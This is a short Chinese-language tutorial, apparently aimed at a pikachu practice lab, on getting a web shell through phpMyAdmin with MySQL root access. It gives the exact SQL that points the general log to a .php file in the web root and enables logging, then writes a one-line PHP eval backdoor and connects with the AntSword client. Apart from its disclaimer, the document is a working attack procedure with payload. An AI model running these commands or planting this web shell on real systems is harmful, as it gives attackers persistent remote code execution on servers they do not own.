免责声明
文章所涉及内容,仅供安全研究与教学之用,由于传播、利用本文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何法律及连带责任。
前提
知道root密码,phpmyadmin的root权限
步骤
设置mysql日志的路径和开关(需要高权限)
查看日志存放位置,方便设置日志存放位置
show variables like '%log%';设置日志存放位置
set global general_log_file='C:/phpStudy/PHPTutorial/WWW/pikachu/123.php';打开记录日志功能,记录每个操作的命令
set global general_log='ON';执行sql语句,内容为一句话木马
select '<?php @eval($_POST[abc]); ?>';蚁剑直接连接日志路径即可
